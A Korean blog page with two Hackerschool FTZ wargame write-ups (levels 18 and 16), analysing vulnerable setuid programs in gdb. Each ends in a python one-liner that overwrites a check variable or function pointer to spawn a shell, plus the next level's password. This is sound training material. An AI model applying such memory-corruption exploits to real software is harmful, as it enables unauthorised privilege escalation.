'ftz level16' 태그의 글 목록

ftz level16

해커스쿨 FTZ [LEVEL18] 풀이 2018.02.09 3
해커스쿨 FTZ [LEVEL16] 풀이 2018.02.09 4

PREV 1 NEXT

해커스쿨 FTZ [LEVEL18] 풀이

2018. 2. 9. 20:38

해커스쿨 FTZ [LEVEL18] 풀이

M4ndU

해커스쿨 FTZ [LEVEL18] 풀이입니다.

ID | level18

PW | why did you do it

으로 로그인합니다.

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat hint

를 이용해 힌트를 확인합시다.

level18@192.168.31.128's password:

[level18@ftz level18]$ ls -l

total 20

-rwsr-x--- 1 level19 level18 6225 Jan 25 1999 attackme

-rw-r----- 1 root level18 1272 Jan 25 1999 hint

drwxr-xr-x 2 root level18 4096 Feb 24 2002 public_html

drwxrwxr-x 2 root level18 4096 Jan 8 2009 tmp

[level18@ftz level18]$ cat hint

#include <stdio.h>

#include <sys/time.h>

#include <sys/types.h>

#include <unistd.h>

void shellout(void);

int main()

{

char string[100];

int check;

int x = 0;

int count = 0;

fd_set fds;

printf("Enter your command: ");

fflush(stdout);

while(1)

{

if(count >= 100)

printf("what are you trying to do?\n");

if(check == 0xdeadbeef)

shellout();

else

{

FD_ZERO(&fds);

FD_SET(STDIN_FILENO,&fds);

if(select(FD_SETSIZE, &fds, NULL, NULL, NULL) >= 1)

{

if(FD_ISSET(fileno(stdin),&fds))

{

read(fileno(stdin),&x,1);

switch(x)

{

case '\r':

case '\n':

printf("\a");

break;

case 0x08:

count--;

printf("\b \b");

break;

default:

string[count] = x;

count++;

break;

}

void shellout(void)

{

setreuid(3099,3099);

execl("/bin/sh","sh",NULL);

}

소스가 엄청 길어졌습니다..

분석을 해봅시다.

if(count >= 100)

printf("what are you trying to do?\n");

if(check == 0xdeadbeef)

shellout();

count가 100이상이면 문장을 출력하고

check가 0xdeadbeef이면 shellout함수를 실행하네요.

else

{

FD_ZERO(&fds);

FD_SET(STDIN_FILENO,&fds);

if(select(FD_SETSIZE, &fds, NULL, NULL, NULL) >= 1)

{

if(FD_ISSET(fileno(stdin),&fds))

{

read(fileno(stdin),&x,1);

사용자로부터 입력을 받고, 입력값에서 1바이트를 가져옵니다.

switch(x)

{

case '\r':

case '\n':

printf("\a");

break;

case 0x08:

count--;

printf("\b \b");

break;

default:

string[count] = x;

count++;

break;

}

그 1바이트의 값이 0x08이면 count 값을 1감소하고

그 1바이트의 값이 \r \n 0x08이 아니라면 string[count] 에 그 1바이트값을 대입하고

count의 값을 1증가 시키네요.

void shellout(void)

{

setreuid(3099,3099);

execl("/bin/sh","sh",NULL);

}

shellout함수는 쉘을 띄워주네요.

우리의 목표는 check의 값을 0xdeadbeef로 만드는 것이네요.

string의 값을 넘치게해서 리턴값을 바꾸는 것은 첫번째 조건문에 걸리기 때문에 불가능하고요.

그런데 check는 string보다 더 낮은주소에 있습니다. 그럼 check를 어떻게 조작해야 할까요?

만약 count가 음수라면..? string의 시작주소보다 더 낮은주소에 접근할 수 있지 않을까요?

gdb를 통해 한번 보겠습니다.

코드가 길어서 중요한 부분만 적겠습니다.

0x080485ab <main+91>: cmp DWORD PTR [ebp-104],0xdeadbeef

ebp-104와 0xdeadbeef를 비교하네요. ebp-104가 check임을 알 수 있습니다.

그리고 밑으로 내려가보면

0x08048743 <main+499>: lea eax,[ebp-100]

0x08048746 <main+502>: mov DWORD PTR [ebp-252],eax

0x0804874c <main+508>: mov edx,DWORD PTR [ebp-112]

0x0804874f <main+511>: mov cl,BYTE PTR [ebp-108]

0x08048752 <main+514>: mov BYTE PTR [ebp-253],cl

0x08048758 <main+520>: mov al,BYTE PTR [ebp-253]

0x0804875e <main+526>: mov ecx,DWORD PTR [ebp-252]

0x08048764 <main+532>: mov BYTE PTR [edx+ecx],al

0x08048767 <main+535>: inc DWORD PTR [ebp-112] //count++;

0x0804876a <main+538>: jmp 0x8048770 <main+544> //break;

밑에 inc도 있고 하니 default: 부분인것 같습니다.

string은 ebp-100이 되겠네요.

그러면 check와 string사이에 dummy는 없습니다.

이 구조를 나타내면

낮은주소

check[0] - string[-4]

check[1] - string[-3]

check[2] - stirng[-2]

check[3] - stirng[-1]

string[0]

string[1]

...

string[99]

높은주소

이해가 되시나요?

우리가 도달해야 할 곳은 string[-4]이고, count의 초기값은 0입니다.

count의 값을 감소시키는 방법은 0x08을 보내는 것이죠.

0x08을 4번 보내어 string[-4]부터 쓸 수 있도록 만들고 0xdeadbeef를 덮어쓰면 되겠습니다.

(python -c 'print "\x08"*4+"\xef\xbe\xad\xde"'; cat) | ./attackme

[level18@ftz level18]$ (python -c 'print "\x08"*4+"\xef\xbe\xad\xde"'; cat) | ./attackme

Enter your command: my-pass

Level19 Password is "swimming in pink".

성공입니드아! GAZA!!!!!!!!

저작자표시 비영리 동일조건

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL20] 풀이 (2)	2018.02.10
해커스쿨 FTZ [LEVEL19] 풀이 (0)	2018.02.09
해커스쿨 FTZ [LEVEL17] 풀이 (2)	2018.02.09
해커스쿨 FTZ [LEVEL16] 풀이 (4)	2018.02.09
해커스쿨 FTZ [LEVEL15] 풀이 (0)	2018.02.09

해커스쿨 FTZ [LEVEL16] 풀이

2018. 2. 9. 17:02

해커스쿨 FTZ [LEVEL16] 풀이

M4ndU

해커스쿨 FTZ [LEVEL16] 풀이입니다.

ID | level16

PW | about to cause mass

으로 로그인합니다.

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat hint

를 이용해 힌트를 확인합시다.

level16@192.168.31.128's password:

[level16@ftz level16]$ ls -l

total 32

-rwsr-x--- 1 level17 level16 14017 Mar 8 2003 attackme

-rw-r----- 1 root root 235 Mar 8 2003 attackme.c

-rw-r----- 1 root level16 235 Mar 8 2003 hint

drwxr-xr-x 2 root level16 4096 Feb 24 2002 public_html

drwxrwxr-x 2 root level16 4096 Jan 11 2009 tmp

[level16@ftz level16]$ cat hint

#include <stdio.h>

void shell() {

setreuid(3097,3097);

system("/bin/sh");

}

void printit() {

printf("Hello there!\n");

}

main()

{ int crap;

void (*call)()=printit;

char buf[20];

fgets(buf,48,stdin);

call();

}

20바이트의 buf에 48바이트 입력을 받고, call()를 하는데 printit함수의 주소를 call을 하는 것 같습니다.

우리는 shell함수를 call하도록 만들면 되겠네요.

변수 buf가 선언되고 *call이 선언되었으니 call부분을 덮어쓸 수 있을 것 같습니다.

이제 buf와 call의 거리를 계산해 봅시다.

[level16@ftz level16]$ gdb -q attackme

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x08048518 <main+0>: push ebp

0x08048519 <main+1>: mov ebp,esp

0x0804851b <main+3>: sub esp,0x38

0x0804851e <main+6>: mov DWORD PTR [ebp-16],0x8048500

0x08048525 <main+13>: sub esp,0x4

0x08048528 <main+16>: push ds:0x80496e8

0x0804852e <main+22>: push 0x30

0x08048530 <main+24>: lea eax,[ebp-56]

0x08048533 <main+27>: push eax

0x08048534 <main+28>: call 0x8048384 <fgets>

0x08048539 <main+33>: add esp,0x10

0x0804853c <main+36>: mov eax,DWORD PTR [ebp-16]

0x0804853f <main+39>: call eax

0x08048541 <main+41>: leave

0x08048542 <main+42>: ret

ebp-16에 0x8048500을 넣고

ebp-56에 입력값을 받으니

ebp-56이 buf이고, ebp-16이 call 인것 같습니다.

그러면 ebp-16에 들어간 0x8048500은 printit 함수의 시작주소이겠죠?

확인해 봅시다.

(gdb) disas printit

Dump of assembler code for function printit:

0x08048500 <printit+0>: push ebp

0x08048501 <printit+1>: mov ebp,esp

0x08048503 <printit+3>: sub esp,0x8

0x08048506 <printit+6>: sub esp,0xc

0x08048509 <printit+9>: push 0x80485c0

0x0804850e <printit+14>: call 0x80483a4 <printf>

0x08048513 <printit+19>: add esp,0x10

0x08048516 <printit+22>: leave

0x08048517 <printit+23>: ret

End of assembler dump.

맞네요.

우리는 ebp-16의 값을 printit함수의 시작주소가 아닌 shell함수의 시작주소로 바꿔주는 것이 목표이므로

shell함수의 시작주소도 확인해 봅시다.

(gdb) disas shell

Dump of assembler code for function shell:

0x080484d0 <shell+0>: push ebp

0x080484d1 <shell+1>: mov ebp,esp

0x080484d3 <shell+3>: sub esp,0x8

0x080484d6 <shell+6>: sub esp,0x8

0x080484d9 <shell+9>: push 0xc19

0x080484de <shell+14>: push 0xc19

0x080484e3 <shell+19>: call 0x80483b4 <setreuid>

0x080484e8 <shell+24>: add esp,0x10

0x080484eb <shell+27>: sub esp,0xc

0x080484ee <shell+30>: push 0x80485b8

0x080484f3 <shell+35>: call 0x8048364 <system>

0x080484f8 <shell+40>: add esp,0x10

0x080484fb <shell+43>: leave

0x080484fc <shell+44>: ret

shell함수의 시작주소는 0x080484d0 이네요.

이제 익스플로잇을 작성합시다!

(python -c 'print "A"*40+"\xd0\x84\x04\x08"'; cat) | ./attackme

[level16@ftz level16]$ (python -c 'print "A"*40+"\xd0\x84\x04\x08"'; cat) | ./attackme

my-pass

Level17 Password is "king poetic".

성공입니다! Ga즈Aㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏ

저작자표시 비영리 동일조건

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL18] 풀이 (3)	2018.02.09
해커스쿨 FTZ [LEVEL17] 풀이 (2)	2018.02.09
해커스쿨 FTZ [LEVEL15] 풀이 (0)	2018.02.09
해커스쿨 FTZ [LEVEL14] 풀이 (4)	2018.02.09
해커스쿨 FTZ [LEVEL13] 풀이 (2)	2018.02.09

PREV 1 NEXT

M4ndU의 만두만두한 블로그

ftz level16

해커스쿨 FTZ [LEVEL18] 풀이

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL16] 풀이

'System Hacking > FTZ' 카테고리의 다른 글

+ Recent posts

티스토리툴바